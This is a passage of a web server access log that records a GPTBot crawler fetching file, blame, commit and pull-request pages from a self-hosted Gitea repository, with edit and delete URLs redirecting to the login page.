[Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 9792] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 30374] [Gzip 8.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23279] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old" [Client 74.7.227.38] [Length 42648] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 11183] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14666] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:24:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:24:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 11004] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:24:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:24:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 10168] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 36475] [Gzip 15.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14631] [Gzip 7.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 18096] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:24:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 